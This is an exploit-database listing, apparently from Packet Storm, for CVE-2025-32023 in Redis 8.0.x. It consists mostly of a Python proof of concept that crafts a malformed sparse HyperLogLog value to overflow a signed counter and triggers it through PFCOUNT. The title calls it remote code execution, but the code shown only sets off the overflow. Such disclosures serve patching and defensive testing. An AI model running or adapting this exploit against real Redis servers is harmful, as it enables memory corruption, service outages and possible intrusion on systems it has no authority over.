
Redis 8.0.2 Remote Code Execution

05 Feb 2026 00:00:00 | Reported by Beatriz Fresno Naumova | Type: packetstorm | Source: packetstorm.news

Redis 8.0.2 remote code execution exploit for vulnerability CVE-2025-32023, affecting 8.0.x.

Code
    # Exploit Title: Redis RCE
    # Date: 2025-10-07
    # Exploit Author: Beatriz Fresno Naumova
    # Vendor Homepage: https://redis.io/
    # Software Link: https://redis.io/
    # Version: Affects >= 8.0.0, < 8.0.3
    # Tested on: Ubuntu 22.04
    # CVE: CVE-2025-32023
    
    import redis
    import sys
    
    # --- Configuration ---
    REDIS_HOST = 'localhost'
    REDIS_PORT = 6379
    REDIS_KEY = 'hll:exp'
    
    # HLL encoding type (1 = sparse)
    HLL_SPARSE = 1
    
    
    def p8(value):
        """Convert integer to single byte."""
        return bytes([value])
    
    
    def xzero(size):
        """
        Construct an 'xzero' run for sparse HLL:
        Creates a run-length encoding entry of zeroes with a specific size.
        """
        if not (1 <= size <= 0x4000):
            raise ValueError("Invalid xzero size: must be between 1 and 0x4000")
        size -= 1
        return p8(0b01_000000 | (size >> 8)) + p8(size & 0xff)
    
    
    def build_malformed_hll():
        """
        Construct a malformed HLL payload that overflows internal counters.
        """
        payload = b'HYLL'                # Magic header
        payload += p8(HLL_SPARSE)        # Encoding type: sparse
        payload += p8(0) * 3             # Reserved
        payload += p8(0) * 8             # Unused (padding)
        
        assert len(payload) == 0x10      # Check header size
        
        # Append enough xzero runs to cause overflow
        payload += xzero(0x4000) * 0x20000  # == -0x80000000 when cast to signed int
    
        # Add one more run to complete the structure
        payload += p8(0b11111111)  # Runlen=4, regval=0x20 (but malformed)
    
        return payload
    
    
    def main():
        try:
            print(f"[*] Connecting to Redis at {REDIS_HOST}:{REDIS_PORT}...")
            r = redis.Redis(REDIS_HOST, REDIS_PORT)
    
            print("[*] Building malformed HyperLogLog payload...")
            hll_payload = build_malformed_hll()
    
            print(f"[*] Writing malformed HLL to key: {REDIS_KEY}")
            r.set(REDIS_KEY, hll_payload)
    
            print("[*] Triggering HLL merge operation (pfcount)...")
            r.pfcount(REDIS_KEY, REDIS_KEY)
    
            print("[+] Exploit triggered successfully.")
        except Exception as e:
            print(f"[!] Exploit failed: {e}")
            sys.exit(1)
    
    
    if __name__ == "__main__":
        main()

Vulners AI Score: 8.8 (High risk)
CVSS 3.1: 7 - 7.8
EPSS: 0.18438